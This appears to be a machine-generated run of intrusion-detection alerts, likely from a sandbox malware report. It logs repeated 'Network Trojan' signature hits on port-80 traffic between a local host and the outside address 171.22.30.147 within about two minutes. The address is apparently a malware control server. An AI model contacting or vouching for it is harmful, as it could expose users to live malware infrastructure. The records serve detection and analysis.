            Timestamp:192.168.2.3171.22.30.14749765802825766 01/05/23-08:52:29.748218
            SID:2825766
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749705802021641 01/05/23-08:52:09.363911
            SID:2021641
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749918802021641 01/05/23-08:53:15.920283
            SID:2021641
            Source Port:49918
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749973802825766 01/05/23-08:53:32.829653
            SID:2825766
            Source Port:49973
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500422025483 01/05/23-08:53:52.766868
            SID:2025483
            Source Port:80
            Destination Port:50042
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499672025483 01/05/23-08:53:31.314561
            SID:2025483
            Source Port:80
            Destination Port:49967
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749729802024313 01/05/23-08:52:19.554519
            SID:2024313
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749757802024318 01/05/23-08:52:27.498112
            SID:2024318
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749913802021641 01/05/23-08:53:14.593137
            SID:2021641
            Source Port:49913
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750024802024318 01/05/23-08:53:47.812882
            SID:2024318
            Source Port:50024
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749729802024318 01/05/23-08:52:19.554519
            SID:2024318
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749748802024318 01/05/23-08:52:24.879047
            SID:2024318
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750007802025381 01/05/23-08:53:41.829015
            SID:2025381
            Source Port:50007
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500832025483 01/05/23-08:54:03.870341
            SID:2025483
            Source Port:80
            Destination Port:50083
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498712025483 01/05/23-08:53:01.907904
            SID:2025483
            Source Port:80
            Destination Port:49871
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498742025483 01/05/23-08:53:02.704853
            SID:2025483
            Source Port:80
            Destination Port:49874
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500012025483 01/05/23-08:53:40.323123
            SID:2025483
            Source Port:80
            Destination Port:50001
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749945802825766 01/05/23-08:53:23.275014
            SID:2825766
            Source Port:49945
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749850802825766 01/05/23-08:52:56.172529
            SID:2825766
            Source Port:49850
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749946802021641 01/05/23-08:53:23.547730
            SID:2021641
            Source Port:49946
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749785802024318 01/05/23-08:52:36.951784
            SID:2024318
            Source Port:49785
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749768802025381 01/05/23-08:52:30.564042
            SID:2025381
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749785802024313 01/05/23-08:52:36.951784
            SID:2024313
            Source Port:49785
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750026802025381 01/05/23-08:53:48.341265
            SID:2025381
            Source Port:50026
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750043802024318 01/05/23-08:53:52.949985
            SID:2024318
            Source Port:50043
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749748802024313 01/05/23-08:52:24.879047
            SID:2024313
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749822802825766 01/05/23-08:52:47.112264
            SID:2825766
            Source Port:49822
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750024802024313 01/05/23-08:53:47.812882
            SID:2024313
            Source Port:50024
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749917802825766 01/05/23-08:53:15.635846
            SID:2825766
            Source Port:49917
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499972025483 01/05/23-08:53:39.292691
            SID:2025483
            Source Port:80
            Destination Port:49997
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749971802025381 01/05/23-08:53:32.299331
            SID:2025381
            Source Port:49971
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749927802021641 01/05/23-08:53:18.426652
            SID:2021641
            Source Port:49927
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498332025483 01/05/23-08:52:50.173155
            SID:2025483
            Source Port:80
            Destination Port:49833
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749974802021641 01/05/23-08:53:33.106432
            SID:2021641
            Source Port:49974
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749987802825766 01/05/23-08:53:36.549688
            SID:2825766
            Source Port:49987
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750071802024313 01/05/23-08:54:00.426977
            SID:2024313
            Source Port:50071
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498412025483 01/05/23-08:52:53.827492
            SID:2025483
            Source Port:80
            Destination Port:49841
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750063802025381 01/05/23-08:53:58.331391
            SID:2025381
            Source Port:50063
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749787802025381 01/05/23-08:52:37.509502
            SID:2025381
            Source Port:49787
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498222025483 01/05/23-08:52:47.191039
            SID:2025483
            Source Port:80
            Destination Port:49822
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750080802024313 01/05/23-08:54:02.852694
            SID:2024313
            Source Port:50080
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500122025483 01/05/23-08:53:43.270055
            SID:2025483
            Source Port:80
            Destination Port:50012
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498602025483 01/05/23-08:52:58.960095
            SID:2025483
            Source Port:80
            Destination Port:49860
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750080802024318 01/05/23-08:54:02.852694
            SID:2024318
            Source Port:50080
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750054802025381 01/05/23-08:53:55.890469
            SID:2025381
            Source Port:50054
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750071802024318 01/05/23-08:54:00.426977
            SID:2024318
            Source Port:50071
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498632025483 01/05/23-08:52:59.783070
            SID:2025483
            Source Port:80
            Destination Port:49863
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749943802025381 01/05/23-08:53:22.718924
            SID:2025381
            Source Port:49943
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749759802025381 01/05/23-08:52:28.024665
            SID:2025381
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498002025483 01/05/23-08:52:41.187781
            SID:2025483
            Source Port:80
            Destination Port:49800
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749805802024318 01/05/23-08:52:42.467353
            SID:2024318
            Source Port:49805
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498822025483 01/05/23-08:53:04.870118
            SID:2025483
            Source Port:80
            Destination Port:49882
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498852025483 01/05/23-08:53:05.656001
            SID:2025483
            Source Port:80
            Destination Port:49885
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750009802825766 01/05/23-08:53:42.368696
            SID:2825766
            Source Port:50009
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749955802021641 01/05/23-08:53:25.989714
            SID:2021641
            Source Port:49955
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749803802825766 01/05/23-08:52:41.905218
            SID:2825766
            Source Port:49803
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749828802021641 01/05/23-08:52:48.735651
            SID:2021641
            Source Port:49828
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750052802024318 01/05/23-08:53:55.369344
            SID:2024318
            Source Port:50052
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750052802024313 01/05/23-08:53:55.369344
            SID:2024313
            Source Port:50052
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750028802825766 01/05/23-08:53:48.853917
            SID:2825766
            Source Port:50028
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749888802825766 01/05/23-08:53:06.392338
            SID:2825766
            Source Port:49888
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749776802024318 01/05/23-08:52:33.619524
            SID:2024318
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750035802025381 01/05/23-08:53:50.741604
            SID:2025381
            Source Port:50035
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749805802024313 01/05/23-08:52:42.467353
            SID:2024313
            Source Port:49805
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750082802025381 01/05/23-08:54:03.532238
            SID:2025381
            Source Port:50082
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749776802024313 01/05/23-08:52:33.619524
            SID:2024313
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749799802021641 01/05/23-08:52:40.836883
            SID:2021641
            Source Port:49799
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749989802024318 01/05/23-08:53:37.099082
            SID:2024318
            Source Port:49989
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749702802025381 01/05/23-08:52:08.155254
            SID:2025381
            Source Port:49702
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749757802024313 01/05/23-08:52:27.498112
            SID:2024313
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749960802024313 01/05/23-08:53:28.475539
            SID:2024313
            Source Port:49960
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749960802024318 01/05/23-08:53:28.475539
            SID:2024318
            Source Port:49960
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749770802021641 01/05/23-08:52:31.112136
            SID:2021641
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749915802025381 01/05/23-08:53:15.112176
            SID:2025381
            Source Port:49915
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498302025483 01/05/23-08:52:49.327790
            SID:2025483
            Source Port:80
            Destination Port:49830
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749983802021641 01/05/23-08:53:35.478290
            SID:2021641
            Source Port:49983
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749831802825766 01/05/23-08:52:49.539016
            SID:2825766
            Source Port:49831
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749714802021641 01/05/23-08:52:13.349412
            SID:2021641
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749957802025381 01/05/23-08:53:26.768134
            SID:2025381
            Source Port:49957
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500232025483 01/05/23-08:53:47.629813
            SID:2025483
            Source Port:80
            Destination Port:50023
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749713802825766 01/05/23-08:52:12.826844
            SID:2825766
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749775802021641 01/05/23-08:52:32.683406
            SID:2021641
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749844802025381 01/05/23-08:52:54.549139
            SID:2025381
            Source Port:49844
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749869802825766 01/05/23-08:53:01.298022
            SID:2825766
            Source Port:49869
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749808802825766 01/05/23-08:52:43.325468
            SID:2825766
            Source Port:49808
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749729802021641 01/05/23-08:52:19.554519
            SID:2021641
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749757802021641 01/05/23-08:52:27.498112
            SID:2021641
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749989802024313 01/05/23-08:53:37.099082
            SID:2024313
            Source Port:49989
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749862802025381 01/05/23-08:52:59.436708
            SID:2025381
            Source Port:49862
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498902025483 01/05/23-08:53:07.016304
            SID:2025483
            Source Port:80
            Destination Port:49890
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749941802024313 01/05/23-08:53:22.165125
            SID:2024313
            Source Port:49941
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749816802025381 01/05/23-08:52:45.483412
            SID:2025381
            Source Port:49816
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749939802025381 01/05/23-08:53:21.632432
            SID:2025381
            Source Port:49939
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749941802024318 01/05/23-08:53:22.165125
            SID:2024318
            Source Port:49941
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749747802021641 01/05/23-08:52:24.577114
            SID:2021641
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749898802021641 01/05/23-08:53:09.845609
            SID:2021641
            Source Port:49898
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750014802021641 01/05/23-08:53:43.719267
            SID:2021641
            Source Port:50014
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749801802025381 01/05/23-08:52:41.371912
            SID:2025381
            Source Port:49801
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749742802021641 01/05/23-08:52:23.189713
            SID:2021641
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750070802021641 01/05/23-08:54:00.166694
            SID:2021641
            Source Port:50070
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497582025483 01/05/23-08:52:27.844272
            SID:2025483
            Source Port:80
            Destination Port:49758
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749785802021641 01/05/23-08:52:36.951784
            SID:2021641
            Source Port:49785
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749811802025381 01/05/23-08:52:44.140113
            SID:2025381
            Source Port:49811
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749897802825766 01/05/23-08:53:09.055046
            SID:2825766
            Source Port:49897
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749819802021641 01/05/23-08:52:46.293306
            SID:2021641
            Source Port:49819
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749834802025381 01/05/23-08:52:50.512718
            SID:2025381
            Source Port:49834
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498552025483 01/05/23-08:52:57.599001
            SID:2025483
            Source Port:80
            Destination Port:49855
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750024802021641 01/05/23-08:53:47.812882
            SID:2021641
            Source Port:50024
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749711802025381 01/05/23-08:52:12.061796
            SID:2025381
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749719802021641 01/05/23-08:52:15.841614
            SID:2021641
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749929802025381 01/05/23-08:53:18.948979
            SID:2025381
            Source Port:49929
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498442025483 01/05/23-08:52:54.638029
            SID:2025483
            Source Port:80
            Destination Port:49844
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499862025483 01/05/23-08:53:36.369726
            SID:2025483
            Source Port:80
            Destination Port:49986
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750042802021641 01/05/23-08:53:52.687057
            SID:2021641
            Source Port:50042
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749906802025381 01/05/23-08:53:12.686115
            SID:2025381
            Source Port:49906
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749899802024318 01/05/23-08:53:10.169881
            SID:2024318
            Source Port:49899
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750010802024318 01/05/23-08:53:42.643021
            SID:2024318
            Source Port:50010
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749899802024313 01/05/23-08:53:10.169881
            SID:2024313
            Source Port:49899
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749856802024313 01/05/23-08:52:57.793570
            SID:2024313
            Source Port:49856
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749892802825766 01/05/23-08:53:07.470439
            SID:2825766
            Source Port:49892
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750079802825766 01/05/23-08:54:02.588823
            SID:2825766
            Source Port:50079
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749806802025381 01/05/23-08:52:42.779655
            SID:2025381
            Source Port:49806
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749846802825766 01/05/23-08:52:55.097334
            SID:2825766
            Source Port:49846
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749780802021641 01/05/23-08:52:35.511333
            SID:2021641
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749715802024313 01/05/23-08:52:14.021138
            SID:2024313
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749866802024313 01/05/23-08:53:00.520534
            SID:2024313
            Source Port:49866
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749710802024313 01/05/23-08:52:11.662757
            SID:2024313
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499152025483 01/05/23-08:53:15.200997
            SID:2025483
            Source Port:80
            Destination Port:49915
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749710802024318 01/05/23-08:52:11.662757
            SID:2024318
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749866802024318 01/05/23-08:53:00.520534
            SID:2024318
            Source Port:49866
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749959802825766 01/05/23-08:53:28.075379
            SID:2825766
            Source Port:49959
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749828802024313 01/05/23-08:52:48.735651
            SID:2024313
            Source Port:49828
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749872802025381 01/05/23-08:53:02.084337
            SID:2025381
            Source Port:49872
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749724802021641 01/05/23-08:52:18.098497
            SID:2021641
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749794802024313 01/05/23-08:52:39.439392
            SID:2024313
            Source Port:49794
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749828802024318 01/05/23-08:52:48.735651
            SID:2024318
            Source Port:49828
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499042025483 01/05/23-08:53:12.229759
            SID:2025483
            Source Port:80
            Destination Port:49904
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750052802021641 01/05/23-08:53:55.369344
            SID:2021641
            Source Port:50052
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749741802825766 01/05/23-08:52:22.916909
            SID:2825766
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749794802024318 01/05/23-08:52:39.439392
            SID:2024318
            Source Port:49794
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749818802825766 01/05/23-08:52:46.013246
            SID:2825766
            Source Port:49818
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749894802024313 01/05/23-08:53:08.006895
            SID:2024313
            Source Port:49894
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749985802025381 01/05/23-08:53:36.027311
            SID:2025381
            Source Port:49985
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749752802021641 01/05/23-08:52:26.039085
            SID:2021641
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750080802021641 01/05/23-08:54:02.852694
            SID:2021641
            Source Port:50080
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749813802825766 01/05/23-08:52:44.686594
            SID:2825766
            Source Port:49813
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749894802024318 01/05/23-08:53:08.006895
            SID:2024318
            Source Port:49894
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750010802024313 01/05/23-08:53:42.643021
            SID:2024313
            Source Port:50010
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749912802825766 01/05/23-08:53:14.329479
            SID:2825766
            Source Port:49912
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749705802024318 01/05/23-08:52:09.363911
            SID:2024318
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749950802021641 01/05/23-08:53:24.624259
            SID:2021641
            Source Port:49950
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750057802024313 01/05/23-08:53:56.743180
            SID:2024313
            Source Port:50057
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750077802025381 01/05/23-08:54:02.067623
            SID:2025381
            Source Port:50077
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750049802025381 01/05/23-08:53:54.543372
            SID:2025381
            Source Port:50049
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499262025483 01/05/23-08:53:18.232650
            SID:2025483
            Source Port:80
            Destination Port:49926
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749997802825766 01/05/23-08:53:39.208772
            SID:2825766
            Source Port:49997
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749733802024318 01/05/23-08:52:20.679095
            SID:2024318
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750000802024318 01/05/23-08:53:39.996140
            SID:2024318
            Source Port:50000
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
